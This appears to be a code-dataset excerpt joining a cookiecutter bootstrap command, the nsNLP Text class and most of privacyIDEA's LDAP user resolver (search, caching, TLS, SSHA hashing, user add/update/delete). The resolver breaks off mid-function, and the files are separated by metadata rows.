sys.exit(0)
def complete_generate_bootstrap(self, text, line, begidx, endidx):
# print("text: %r" % text)
# print("line: %r" % line)
return self._complete_path(text, line, begidx, endidx)
def confirm(self, txt, confirm_values=("y", "j")):
if input("\n%s" % txt).lower() in confirm_values:
return True
return False
def do_generate_bootstrap(self, arg=None):
"""
Generate new bootstrap file via cookiecutter
direct call, e.g.:
bootstrap_env_admin.py generate_bootstrap ~/new_project
"""
        if not arg:
            print("INFO: No output path given.")
            return
        output_dir = Path(arg).expanduser().resolve()
        if output_dir.is_dir():
            print("ERROR: output path already exists: %s" % output_dir)
            return
        print("Create bootstrap file in: %s" % output_dir)
txt = "Create bootstrap file in: %s ? [Y/N]" % output_dir
if not self.confirm(txt):
print("Abort.")
return
repro_path = Path(self.package_path, "boot_source")
result = cookiecutter(
template=str(repro_path),
output_dir=str(output_dir),
extra_context={
"_version": bootstrap_env_version,
}
)
print("bootstrap file created here: %s" % result)
| gpl-3.0 | 498,514,574,296,900,000 | 33.752252 | 115 | 0.576539 | false |
nschaetti/nsNLP | data/Text.py | 1 | 2476 | # -*- coding: utf-8 -*-
#
# File : data/Text.py
# Description : .
# Date : 16/08/2017
#
# Copyright Nils Schaetti, University of Neuchâtel <[email protected]>
# Imports
from Sample import Sample
import codecs
# Class to access a text
class Text(Sample):
"""
    Class to access a text
"""
# Constructor
def __init__(self, text_path, author, text_title):
"""
Constructor
:param text_path:
:param author:
"""
super(Text, self).__init__(text_path, author)
self._text_path = text_path
self._author = author
self._title = text_title
# end __init__
########################################
# Public
########################################
# Get title
def get_title(self):
"""
Get title
:return:
"""
return self._title
# end get_title
# Get text
def get_text(self):
"""
Get text
:return:
"""
return codecs.open(self._text_path, 'r', encoding='utf-8').read()
# end text
# Save text
def save(self, text):
"""
Save text
:param text:
:return:
"""
return codecs.open(self._text_path, 'w', encoding='utf-8').write(text)
# end save
# Get author
def get_author(self):
"""
Get author
:return:
"""
return self._author
# end author
# Get path
def get_path(self):
"""
Get path
:return:
"""
return self._text_path
# end get_path
# Get X
def x(self):
"""
Get X
:return:
"""
return self.get_text()
# end x
# Get Y
def y(self):
"""
Get Y
:return:
"""
return self.get_author().get_name()
# end y
########################################
# Override
########################################
# To string
def __unicode__(self):
"""
To string
:return:
"""
return u"Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# To string
def __str__(self):
"""
To string
:return:
"""
return "Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# end Text
| gpl-3.0 | 8,279,968,937,901,342,000 | 19.121951 | 115 | 0.446869 | false |
jh23453/privacyidea | privacyidea/lib/resolvers/LDAPIdResolver.py | 1 | 41677 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Cornelius Kölbel
# contact: [email protected]
#
# 2017-01-23 Cornelius Kölbel <[email protected]>
# Add certificate verification
# 2017-01-07 Cornelius Kölbel <[email protected]>
# Use get_info=ldap3.NONE for binds to avoid querying of subschema
# Remove LDAPFILTER and self.reversefilter
# 2016-07-14 Cornelius Kölbel <[email protected]>
# Adding getUserId cache.
# 2016-04-13 Cornelius Kölbel <[email protected]>
# Add object_classes and dn_composition to configuration
# to allow flexible user_add
# 2016-04-10 Martin Wheldon <[email protected]>
# Allow user accounts held in LDAP to be edited, providing
# that the account they are using has permission to edit
# those attributes in the LDAP directory
# 2016-02-22 Salvo Rapisarda
# Allow objectGUID to be a users attribute
# 2016-02-19 Cornelius Kölbel <[email protected]>
# Allow objectGUID to be the uid.
# 2015-10-05 Cornelius Kölbel <[email protected]>
# Remove reverse_map, so that one LDAP field can map
# to several privacyIDEA fields.
# 2015-04-16 Cornelius Kölbel <[email protected]>
# Add redundancy with LDAP3 Server pools. Round Robin Strategy
# 2015-04-15 Cornelius Kölbel <[email protected]>
# Increase test coverage
# 2014-12-25 Cornelius Kölbel <[email protected]>
# Rewrite for flask migration
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """This is the resolver to find users in LDAP directories like
OpenLDAP and Active Directory.
The file is tested in tests/test_lib_resolver.py
"""
import logging
import yaml
import functools
from UserIdResolver import UserIdResolver
import ldap3
from ldap3 import MODIFY_REPLACE, MODIFY_ADD, MODIFY_DELETE
from ldap3 import Server, Tls, Connection
import ssl
import os.path
import traceback
import hashlib
import binascii
from privacyidea.lib.crypto import urandom, geturandom
from privacyidea.lib.utils import is_true
import datetime
from privacyidea.lib import _
from privacyidea.lib.utils import to_utf8
from privacyidea.lib.error import privacyIDEAError
import uuid
from ldap3.utils.conv import escape_bytes
CACHE = {}
log = logging.getLogger(__name__)
ENCODING = "utf-8"
# The number of rounds the resolver tries to reach a responding server in the
# pool
SERVERPOOL_ROUNDS = 2
# The number of seconds a non-responding server is removed from the server pool
SERVERPOOL_SKIP = 30
# 1 sec == 10^9 nano secs == 10^7 * (100 nano secs)
MS_AD_MULTIPLYER = 10 ** 7
MS_AD_START = datetime.datetime(1601, 1, 1)
if os.path.isfile("/etc/privacyidea/ldap-ca.crt"):
DEFAULT_CA_FILE = "/etc/privacyidea/ldap-ca.crt"
elif os.path.isfile("/etc/ssl/certs/ca-certificates.crt"):
DEFAULT_CA_FILE = "/etc/ssl/certs/ca-certificates.crt"
elif os.path.isfile("/etc/ssl/certs/ca-bundle.crt"):
DEFAULT_CA_FILE = "/etc/ssl/certs/ca-bundle.crt"
else:
DEFAULT_CA_FILE = "/etc/privacyidea/ldap-ca.crt"
def get_ad_timestamp_now():
"""
returns the current UTC time as it is used in Active Directory in the
attribute accountExpires.
This is 100-nano-secs since 1.1.1601
:return: time
:rtype: int
"""
utc_now = datetime.datetime.utcnow()
elapsed_time = utc_now - MS_AD_START
total_seconds = elapsed_time.total_seconds()
# convert this to (100 nanoseconds)
return int(MS_AD_MULTIPLYER * total_seconds)
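# Editorial companion sketch (not used by the resolver below): the inverse of
# get_ad_timestamp_now(), turning an AD 'accountExpires' value back into a
# naive UTC datetime. Shown here only to illustrate the 100-nanosecond units.
def ad_timestamp_to_datetime(ad_timestamp):
    seconds = float(ad_timestamp) / MS_AD_MULTIPLYER
    return MS_AD_START + datetime.timedelta(seconds=seconds)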
def trim_objectGUID(userId):
userId = uuid.UUID("{{{0!s}}}".format(userId)).bytes_le
userId = escape_bytes(userId)
return userId
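# Illustrative note: trim_objectGUID() converts the canonical GUID string into
# the escaped little-endian byte form that Active Directory expects inside a
# search filter, which is why _trim_user_id() applies it before building an
# objectGUID filter.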
def get_info_configuration(noschemas):
"""
Given the value of the NOSCHEMAS config option, return the value that should
be passed as ldap3's `get_info` argument.
:param noschemas: a boolean
:return: one of ldap3.SCHEMA or ldap3.NONE
"""
get_schema_info = ldap3.SCHEMA
if noschemas:
get_schema_info = ldap3.NONE
log.debug("Get LDAP schema info: {0!s}".format(get_schema_info))
return get_schema_info
def cache(func):
"""
cache the user with his loginname, resolver and UID in a local
dictionary cache.
This is a per process cache.
"""
@functools.wraps(func)
def cache_wrapper(self, *args, **kwds):
# If it does not exist, create the node for this instance
resolver_id = self.getResolverId()
if not resolver_id in CACHE:
CACHE[resolver_id] = {"getUserId": {},
"getUserInfo": {},
"_getDN": {}}
# get the portion of the cache for this very LDAP resolver
r_cache = CACHE.get(resolver_id).get(func.func_name)
if args[0] in r_cache and \
datetime.datetime.now() < r_cache[args[0]][
"timestamp"] + \
datetime.timedelta(seconds=self.cache_timeout):
log.debug("Reading {0!s} from cache for {1!s}".format(args[0],
func.func_name))
return r_cache[args[0]]["value"]
f_result = func(self, *args, **kwds)
# now we cache the result
CACHE[resolver_id][func.func_name][args[0]] = {
"value": f_result,
"timestamp": datetime.datetime.now()}
return f_result
return cache_wrapper
class AUTHTYPE(object):
SIMPLE = "Simple"
SASL_DIGEST_MD5 = "SASL Digest-MD5"
NTLM = "NTLM"
class IdResolver (UserIdResolver):
# If the resolver could be configured editable
updateable = True
def __init__(self):
self.i_am_bound = False
self.uri = ""
self.basedn = ""
self.binddn = ""
self.bindpw = ""
self.object_classes = []
self.dn_template = ""
self.timeout = 5.0 # seconds!
self.sizelimit = 500
self.loginname_attribute = ""
self.searchfilter = ""
self.userinfo = {}
self.uidtype = ""
self.noreferrals = False
self._editable = False
self.resolverId = self.uri
self.scope = ldap3.SUBTREE
self.cache_timeout = 120
self.tls_context = None
self.start_tls = False
def checkPass(self, uid, password):
"""
This function checks the password for a given uid.
- returns true in case of success
- false if password does not match
"""
if self.authtype == AUTHTYPE.NTLM: # pragma: no cover
# fetch the PreWindows 2000 Domain from the self.binddn
# which would be of the format DOMAIN\username and compose the
# bind_user to DOMAIN\sAMAcountName
domain_name = self.binddn.split('\\')[0]
uinfo = self.getUserInfo(uid)
# In fact we need the sAMAccountName. If the username mapping is
# another attribute than the sAMAccountName the authentication
# will fail!
bind_user = "{0!s}\{1!s}".format(domain_name, uinfo.get("username"))
else:
bind_user = self._getDN(uid)
server_pool = self.get_serverpool(self.uri, self.timeout,
get_info=ldap3.NONE,
tls_context=self.tls_context)
try:
log.debug("Authtype: {0!r}".format(self.authtype))
log.debug("user : {0!r}".format(bind_user))
# Whatever happens. If we have an empty bind_user, we must break
# since we must avoid anonymous binds!
if not bind_user or len(bind_user) < 1:
raise Exception("No valid user. Empty bind_user.")
l = self.create_connection(authtype=self.authtype,
server=server_pool,
user=bind_user,
password=password,
receive_timeout=self.timeout,
auto_referrals=not self.noreferrals,
start_tls=self.start_tls)
r = l.bind()
log.debug("bind result: {0!r}".format(r))
if not r:
raise Exception("Wrong credentials")
log.debug("bind seems successful.")
l.unbind()
log.debug("unbind successful.")
except Exception as e:
log.warning("failed to check password for {0!r}/{1!r}: {2!r}".format(uid, bind_user, e))
log.debug(traceback.format_exc())
return False
return True
def _trim_result(self, result_list):
"""
The resultlist can contain entries of type:searchResEntry and of
type:searchResRef. If self.noreferrals is true, all type:searchResRef
will be removed.
:param result_list: The result list of a LDAP search
:type result_list: resultlist (list of dicts)
:return: new resultlist
"""
if self.noreferrals:
new_list = []
for result in result_list:
if result.get("type") == "searchResEntry":
new_list.append(result)
elif result.get("type") == "searchResRef":
# This is a Referral
pass
else:
new_list = result_list
return new_list
@staticmethod
def _escape_loginname(loginname):
"""
This function escapes the loginname according to
https://msdn.microsoft.com/en-us/library/aa746475(v=vs.85).aspx
This is to avoid username guessing by trying to login as user
a*
ac*
ach*
achm*
achme*
achemd*
:param loginname: The loginname
:return: The escaped loginname
"""
return loginname.replace("\\", "\\5c").replace("*", "\\2a").replace(
"(", "\\28").replace(")", "\\29").replace("/", "\\2f")
@staticmethod
def _get_uid(entry, uidtype):
uid = None
if uidtype.lower() == "dn":
uid = entry.get("dn")
else:
attributes = entry.get("attributes")
if type(attributes.get(uidtype)) == list:
uid = attributes.get(uidtype)[0]
else:
uid = attributes.get(uidtype)
return uid
def _trim_user_id(self, userId):
"""
If we search for the objectGUID we can not search for the normal
string representation but we need to search for the bytestring in AD.
:param userId: The userId
:return: the trimmed userId
"""
if self.uidtype == "objectGUID":
userId = trim_objectGUID(userId)
return userId
@cache
def _getDN(self, userId):
"""
This function returns the DN of a userId.
        Therefore it evaluates self.uidtype.
:param userId: The userid of a user
:type userId: string
:return: The DN of the object.
"""
dn = ""
if self.uidtype.lower() == "dn":
dn = userId
else:
# get the DN for the Object
self._bind()
search_userId = self._trim_user_id(userId)
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter,
self.uidtype, search_userId)
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=self.userinfo.values())
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for uid {0!r}".format(userId))
elif len(r) == 1:
dn = r[0].get("dn")
else:
log.info("The filter {0!s} returned no DN.".format(filter))
return dn
def _bind(self):
if not self.i_am_bound:
server_pool = self.get_serverpool(self.uri, self.timeout,
get_info=self.get_info,
tls_context=self.tls_context)
self.l = self.create_connection(authtype=self.authtype,
server=server_pool,
user=self.binddn,
password=self.bindpw,
receive_timeout=self.timeout,
auto_referrals=not
self.noreferrals,
start_tls=self.start_tls)
#log.error("LDAP Server Pool States: %s" % server_pool.pool_states)
if not self.l.bind():
raise Exception("Wrong credentials")
self.i_am_bound = True
@cache
def getUserInfo(self, userId):
"""
This function returns all user info for a given userid/object.
:param userId: The userid of the object
:type userId: string
:return: A dictionary with the keys defined in self.userinfo
:rtype: dict
"""
ret = {}
self._bind()
if self.uidtype.lower() == "dn":
            # encode utf8, so that German umlauts also work in the DN
self.l.search(search_base=to_utf8(userId),
search_scope=self.scope,
search_filter="(&" + self.searchfilter + ")",
attributes=self.userinfo.values())
else:
search_userId = self._trim_user_id(userId)
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter,
self.uidtype, search_userId)
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=self.userinfo.values())
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for uid {0!r}".format(userId))
for entry in r:
attributes = entry.get("attributes")
ret = self._ldap_attributes_to_user_object(attributes)
return ret
def _ldap_attributes_to_user_object(self, attributes):
"""
This helper function converts the LDAP attributes to a dictionary for
the privacyIDEA user. The LDAP Userinfo mapping is used to do so.
:param attributes:
:return: dict with privacyIDEA users.
"""
ret = {}
for ldap_k, ldap_v in attributes.items():
for map_k, map_v in self.userinfo.items():
if ldap_k == map_v:
if ldap_k == "objectGUID":
ret[map_k] = ldap_v[0]
elif type(ldap_v) == list and map_k not in ["mobile"]:
                        # All lists (except mobile) return the first value as
                        # a string. Mobile is returned as a list.
if ldap_v:
ret[map_k] = ldap_v[0]
else:
ret[map_k] = ""
else:
ret[map_k] = ldap_v
return ret
def getUsername(self, user_id):
"""
Returns the username/loginname for a given user_id
:param user_id: The user_id in this resolver
:type user_id: string
:return: username
:rtype: string
"""
info = self.getUserInfo(user_id)
return info.get('username', "")
@cache
def getUserId(self, LoginName):
"""
resolve the loginname to the userid.
:param LoginName: The login name from the credentials
:type LoginName: string
:return: UserId as found for the LoginName
"""
userid = ""
self._bind()
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter, self.loginname_attribute,
self._escape_loginname(LoginName))
# create search attributes
attributes = self.userinfo.values()
if self.uidtype.lower() != "dn":
attributes.append(str(self.uidtype))
log.debug("Searching user {0!r} in LDAP.".format(LoginName))
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=attributes)
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for Loginname {0!r}".format(
LoginName))
for entry in r:
userid = self._get_uid(entry, self.uidtype)
return userid
def getUserList(self, searchDict):
"""
:param searchDict: A dictionary with search parameters
:type searchDict: dict
:return: list of users, where each user is a dictionary
"""
ret = []
self._bind()
attributes = self.userinfo.values()
ad_timestamp = get_ad_timestamp_now()
if self.uidtype.lower() != "dn":
attributes.append(str(self.uidtype))
# do the filter depending on the searchDict
filter = u"(&" + self.searchfilter
for search_key in searchDict.keys():
if search_key == "accountExpires":
comperator = ">="
if searchDict[search_key] in ["1", 1]:
comperator = "<="
filter += "(&({0!s}{1!s}{2!s})(!({3!s}=0)))".format(self.userinfo[search_key],
comperator,
get_ad_timestamp_now(),
self.userinfo[search_key])
else:
filter += u"({0!s}={1!s})".format(self.userinfo[search_key],
searchDict[search_key])
filter += ")"
g = self.l.extend.standard.paged_search(search_base=self.basedn,
search_filter=filter,
search_scope=self.scope,
attributes=attributes,
paged_size=100,
size_limit=self.sizelimit,
generator=True)
# returns a generator of dictionaries
for entry in g:
# Simple fix for ignored sizelimit with Active Directory
if len(ret) >= self.sizelimit:
break
try:
attributes = entry.get("attributes")
user = self._ldap_attributes_to_user_object(attributes)
user['userid'] = self._get_uid(entry, self.uidtype)
ret.append(user)
except Exception as exx: # pragma: no cover
log.error("Error during fetching LDAP objects: {0!r}".format(exx))
log.debug("{0!s}".format(traceback.format_exc()))
return ret
def getResolverId(self):
"""
        Returns the resolver Id.
        This should be an identifier of the resolver, preferably the type
        and the name of the resolver.
"""
s = "{0!s}{1!s}{2!s}{3!s}".format(self.uri, self.basedn,
self.searchfilter, self.userinfo)
r = binascii.hexlify(hashlib.sha1(s).digest())
return r
@staticmethod
def getResolverClassType():
return 'ldapresolver'
@staticmethod
def getResolverDescriptor():
return IdResolver.getResolverClassDescriptor()
@staticmethod
def getResolverType():
return IdResolver.getResolverClassType()
def loadConfig(self, config):
"""
Load the config from conf.
:param config: The configuration from the Config Table
:type config: dict
'#ldap_uri': 'LDAPURI',
'#ldap_basedn': 'LDAPBASE',
'#ldap_binddn': 'BINDDN',
'#ldap_password': 'BINDPW',
'#ldap_timeout': 'TIMEOUT',
'#ldap_sizelimit': 'SIZELIMIT',
'#ldap_loginattr': 'LOGINNAMEATTRIBUTE',
'#ldap_searchfilter': 'LDAPSEARCHFILTER',
'#ldap_mapping': 'USERINFO',
'#ldap_uidtype': 'UIDTYPE',
'#ldap_noreferrals' : 'NOREFERRALS',
'#ldap_editable' : 'EDITABLE',
'#ldap_certificate': 'CACERTIFICATE',
"""
self.uri = config.get("LDAPURI")
self.basedn = config.get("LDAPBASE")
self.binddn = config.get("BINDDN")
# object_classes is a comma separated list like
# ["top", "person", "organizationalPerson", "user", "inetOrgPerson"]
self.object_classes = [cl.strip() for cl in config.get("OBJECT_CLASSES", "").split(",")]
self.dn_template = config.get("DN_TEMPLATE", "")
self.bindpw = config.get("BINDPW")
self.timeout = float(config.get("TIMEOUT", 5))
self.cache_timeout = int(config.get("CACHE_TIMEOUT", 120))
self.sizelimit = int(config.get("SIZELIMIT", 500))
self.loginname_attribute = config.get("LOGINNAMEATTRIBUTE")
self.searchfilter = config.get("LDAPSEARCHFILTER")
userinfo = config.get("USERINFO", "{}")
self.userinfo = yaml.safe_load(userinfo)
self.userinfo["username"] = self.loginname_attribute
self.map = yaml.safe_load(userinfo)
self.uidtype = config.get("UIDTYPE", "DN")
self.noreferrals = is_true(config.get("NOREFERRALS", False))
self.start_tls = is_true(config.get("START_TLS", False))
self.get_info = get_info_configuration(is_true(config.get("NOSCHEMAS", False)))
self._editable = config.get("EDITABLE", False)
self.scope = config.get("SCOPE") or ldap3.SUBTREE
self.resolverId = self.uri
self.authtype = config.get("AUTHTYPE", AUTHTYPE.SIMPLE)
self.tls_verify = is_true(config.get("TLS_VERIFY", False))
self.tls_ca_file = config.get("TLS_CA_FILE") or DEFAULT_CA_FILE
if self.tls_verify and (self.uri.lower().startswith("ldaps") or
self.start_tls):
self.tls_context = Tls(validate=ssl.CERT_REQUIRED,
version=ssl.PROTOCOL_TLSv1,
ca_certs_file=self.tls_ca_file)
else:
self.tls_context = None
return self
@staticmethod
def split_uri(uri):
"""
Splits LDAP URIs like:
* ldap://server
* ldaps://server
* ldap[s]://server:1234
* server
:param uri: The LDAP URI
:return: Returns a tuple of Servername, Port and SSL(bool)
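
        Illustrative examples (not exhaustive):

          * "ldaps://ldap.example.com:636" -> ("ldap.example.com", 636, True)
          * "ldap://192.0.2.1"             -> ("192.0.2.1", None, False)
          * "server1"                      -> ("server1", None, False)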
"""
port = None
ssl = False
ldap_elems = uri.split(":")
if len(ldap_elems) == 3:
server = ldap_elems[1].strip("/")
port = int(ldap_elems[2])
if ldap_elems[0].lower() == "ldaps":
ssl = True
else:
ssl = False
elif len(ldap_elems) == 2:
server = ldap_elems[1].strip("/")
port = None
if ldap_elems[0].lower() == "ldaps":
ssl = True
else:
ssl = False
else:
server = uri
return server, port, ssl
@classmethod
def get_serverpool(cls, urilist, timeout, get_info=None, tls_context=None):
"""
        This creates the server pool for the ldap3 connection.
The URI from the LDAP resolver can contain a comma separated list of
LDAP servers. These are split and then added to the pool.
See
https://github.com/cannatag/ldap3/blob/master/docs/manual/source/servers.rst#server-pool
:param urilist: The list of LDAP URIs, comma separated
:type urilist: basestring
:param timeout: The connection timeout
:type timeout: float
        :param get_info: The get_info type passed to the ldap3.Server
            constructor. Default: ldap3.SCHEMA; should be ldap3.NONE in case
            of a bind.
        :param tls_context: An ldap3.Tls object, which defines whether
            certificate verification should be performed
:return: Server Pool
:rtype: LDAP3 Server Pool Instance
"""
get_info = get_info or ldap3.SCHEMA
server_pool = ldap3.ServerPool(None, ldap3.ROUND_ROBIN,
active=SERVERPOOL_ROUNDS,
exhaust=SERVERPOOL_SKIP)
for uri in urilist.split(","):
uri = uri.strip()
host, port, ssl = cls.split_uri(uri)
server = ldap3.Server(host, port=port,
use_ssl=ssl,
connect_timeout=float(timeout),
get_info=get_info,
tls=tls_context)
server_pool.add(server)
log.debug("Added {0!s}, {1!s}, {2!s} to server pool.".format(host, port, ssl))
return server_pool
@classmethod
def getResolverClassDescriptor(cls):
"""
return the descriptor of the resolver, which is
- the class name and
- the config description
:return: resolver description dict
:rtype: dict
"""
descriptor = {}
typ = cls.getResolverType()
descriptor['clazz'] = "useridresolver.LDAPIdResolver.IdResolver"
descriptor['config'] = {'LDAPURI': 'string',
'LDAPBASE': 'string',
'BINDDN': 'string',
'BINDPW': 'password',
'TIMEOUT': 'int',
'SIZELIMIT': 'int',
'LOGINNAMEATTRIBUTE': 'string',
'LDAPSEARCHFILTER': 'string',
'USERINFO': 'string',
'UIDTYPE': 'string',
'NOREFERRALS': 'bool',
'NOSCHEMAS': 'bool',
'CACERTIFICATE': 'string',
'EDITABLE': 'bool',
'SCOPE': 'string',
'AUTHTYPE': 'string',
'TLS_VERIFY': 'bool',
'TLS_CA_FILE': 'string',
'START_TLS': 'bool'}
return {typ: descriptor}
@classmethod
def testconnection(cls, param):
"""
        This function lets you test the LDAP connection before it is saved.
:param param: A dictionary with all necessary parameter to test
the connection.
:type param: dict
:return: Tuple of success and a description
:rtype: (bool, string)
Parameters are:
BINDDN, BINDPW, LDAPURI, TIMEOUT, LDAPBASE, LOGINNAMEATTRIBUTE,
LDAPSEARCHFILTER, USERINFO, SIZELIMIT, NOREFERRALS, CACERTIFICATE,
AUTHTYPE, TLS_VERIFY, TLS_CA_FILE
"""
success = False
uidtype = param.get("UIDTYPE")
timeout = float(param.get("TIMEOUT", 5))
ldap_uri = param.get("LDAPURI")
size_limit = int(param.get("SIZELIMIT", 500))
if is_true(param.get("TLS_VERIFY")) \
and (ldap_uri.lower().startswith("ldaps") or
param.get("START_TLS")):
tls_ca_file = param.get("TLS_CA_FILE") or DEFAULT_CA_FILE
tls_context = Tls(validate=ssl.CERT_REQUIRED,
version=ssl.PROTOCOL_TLSv1,
ca_certs_file=tls_ca_file)
else:
tls_context = None
get_info = get_info_configuration(is_true(param.get("NOSCHEMAS")))
try:
server_pool = cls.get_serverpool(ldap_uri, timeout,
tls_context=tls_context,
get_info=get_info)
l = cls.create_connection(authtype=param.get("AUTHTYPE",
AUTHTYPE.SIMPLE),
server=server_pool,
user=param.get("BINDDN"),
password=param.get("BINDPW"),
receive_timeout=timeout,
auto_referrals=not param.get(
"NOREFERRALS"),
start_tls=param.get("START_TLS", False))
#log.error("LDAP Server Pool States: %s" % server_pool.pool_states)
if not l.bind():
raise Exception("Wrong credentials")
            # create search attributes
attributes = yaml.safe_load(param["USERINFO"]).values()
if uidtype.lower() != "dn":
attributes.append(str(uidtype))
# search for users...
g = l.extend.standard.paged_search(
search_base=param["LDAPBASE"],
search_filter="(&" + param["LDAPSEARCHFILTER"] + ")",
search_scope=param.get("SCOPE") or ldap3.SUBTREE,
attributes=attributes,
paged_size=100,
size_limit=size_limit,
generator=True)
# returns a generator of dictionaries
count = 0
uidtype_count = 0
for entry in g:
try:
userid = cls._get_uid(entry, uidtype)
count += 1
if userid:
uidtype_count += 1
except Exception as exx: # pragma: no cover
log.warning("Error during fetching LDAP objects:"
" {0!r}".format(exx))
log.debug("{0!s}".format(traceback.format_exc()))
if uidtype_count < count: # pragma: no cover
desc = _("Your LDAP config found %i user objects, but only %i "
"with the specified uidtype" % (count, uidtype_count))
else:
desc = _("Your LDAP config seems to be OK, %i user objects "
"found.") % count
l.unbind()
success = True
except Exception as e:
desc = "{0!r}".format(e)
return success, desc
def add_user(self, attributes=None):
"""
Add a new user to the LDAP directory.
The user can only be created in the LDAP using a DN.
So we have to construct the DN out of the given attributes.
        The supported attributes are
"username", "surname", "givenname", "email",
"mobile", "phone", "password"
:param attributes: Attributes according to the attribute mapping
:type attributes: dict
:return: The new UID of the user. The UserIdResolver needs to
            determine how to create the UID.
"""
# TODO: We still have some utf8 issues creating users with special characters.
attributes = attributes or {}
dn = self.dn_template
dn = dn.replace("<basedn>", self.basedn)
dn = dn.replace("<username>", attributes.get("username", ""))
dn = dn.replace("<givenname>", attributes.get("givenname", ""))
dn = dn.replace("<surname>", attributes.get("surname", ""))
try:
self._bind()
params = self._attributes_to_ldap_attributes(attributes)
self.l.add(dn, self.object_classes, params)
except Exception as e:
log.error("Error accessing LDAP server: {0}".format(e))
log.debug("{0}".format(traceback.format_exc()))
raise privacyIDEAError(e)
if self.l.result.get('result') != 0:
log.error("Error during adding of user {0}: {1}".format(dn, self.l.result.get('message')))
raise privacyIDEAError(self.l.result.get('message'))
return self.getUserId(attributes.get("username"))
def delete_user(self, uid):
"""
Delete a user from the LDAP Directory.
The user is referenced by the user id.
:param uid: The uid of the user object, that should be deleted.
:type uid: basestring
:return: Returns True in case of success
:rtype: bool
"""
res = True
try:
self._bind()
self.l.delete(self._getDN(uid))
except Exception as exx:
log.error("Error deleting user: {0}".format(exx))
res = False
return res
def _attributes_to_ldap_attributes(self, attributes):
"""
takes the attributes and maps them to the LDAP attributes
:param attributes: Attributes to be updated
:type attributes: dict
:return: dict with attribute name as keys and values
"""
ldap_attributes = {}
for fieldname, value in attributes.iteritems():
if self.map.get(fieldname):
if fieldname == "password":
# Variable value may be either a string or a list
# so catch the TypeError exception if we get the wrong
# variable type
try:
pw_hash = self._create_ssha(value[1][0])
value[1][0] = pw_hash
ldap_attributes[self.map.get(fieldname)] = value
except TypeError as e:
pw_hash = self._create_ssha(value)
ldap_attributes[self.map.get(fieldname)] = pw_hash
else:
ldap_attributes[self.map.get(fieldname)] = value
return ldap_attributes
@staticmethod
def _create_ssha(password):
"""
Encodes the given password as a base64 SSHA hash
:param password: string to hash
:type password: basestring
:return: string encoded as a base64 SSHA hash
"""
salt = geturandom(4)
# Hash password string and append the salt
sha_hash = hashlib.sha1(password)
sha_hash.update(salt)
# Create a base64 encoded string
digest_b64 = '{0}{1}'.format(sha_hash.digest(),
salt).encode('base64').strip()
# Tag it with SSHA
tagged_digest = '{{SSHA}}{}'.format(digest_b64)
return tagged_digest
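    @staticmethod
    def _verify_ssha(tagged_digest, password):
        """
        Editorial sketch, not part of the original resolver: check a password
        against a '{SSHA}' value as produced by _create_ssha() above.
        """
        # strip the '{SSHA}' tag and base64-decode digest+salt
        digest_and_salt = tagged_digest[len('{SSHA}'):].decode('base64')
        digest, salt = digest_and_salt[:20], digest_and_salt[20:]
        # recompute sha1(password || salt) and compare
        sha_hash = hashlib.sha1(password)
        sha_hash.update(salt)
        return sha_hash.digest() == digest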
def _create_ldap_modify_changes(self, attributes, uid):
"""
Identifies if an LDAP attribute already exists and if the value needs to be updated, deleted or added.
:param attributes: Attributes to be updated
:type attributes: dict
:param uid: The uid of the user object in the resolver
:type uid: basestring
:return: dict with attribute name as keys and values
"""
modify_changes = {}
uinfo = self.getUserInfo(uid)
for fieldname, value in attributes.iteritems():
if value:
if fieldname in uinfo:
modify_changes[fieldname] = [MODIFY_REPLACE, [value]]
else:
modify_changes[fieldname] = [MODIFY_ADD, [value]]
else:
modify_changes[fieldname] = [MODIFY_DELETE, [value]]
return modify_changes
def update_user(self, uid, attributes=None):
"""
Update an existing user.
This function is also used to update the password. Since the
        attribute mapping knows which field contains the password,
        this function can also take care of password changes.
Attributes that are not contained in the dict attributes are not
modified.
:param uid: The uid of the user object in the resolver.
:type uid: basestring
:param attributes: Attributes to be updated.
:type attributes: dict
:return: True in case of success
"""
attributes = attributes or {}
try:
self._bind()
mapped = self._create_ldap_modify_changes(attributes, uid)
params = self._attributes_to_ldap_attributes(mapped)
self.l.modify(self._getDN(uid), params)
except Exception as e:
log.error("Error accessing LDAP server: {0!s}".format(e))
log.debug("{0!s}".format(traceback.format_exc()))
return False
if self.l.result.get('result') != 0:
log.error("Error during update of user {0!s}: {1!s}".format(uid, self.l.result.get("message")))
return False
return True
@staticmethod
def create_connection(authtype=None, server=None, user=None,
password=None, auto_bind=False,
client_strategy=ldap3.SYNC,
check_names=True,
auto_referrals=False,
receive_timeout=5,
start_tls=False):
"""
Create a connection to the LDAP server.
:param authtype:
:param server:
:param user:
:param password:
:param auto_bind:
:param client_strategy:
:param check_names:
:param auto_referrals:
:param receive_timeout: At the moment we do not use this,
since receive_timeout is not supported by ldap3 < 2.
:return:
"""
authentication = None
if not user:
authentication = ldap3.ANONYMOUS
if authtype == AUTHTYPE.SIMPLE:
if not authentication:
authentication = ldap3.SIMPLE
# SIMPLE works with passwords as UTF8 and unicode
l = ldap3.Connection(server, user=user,
password=password,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
elif authtype == AUTHTYPE.NTLM: # pragma: no cover
if not authentication:
authentication = ldap3.NTLM
# NTLM requires the password to be unicode
l = ldap3.Connection(server,
user=user,
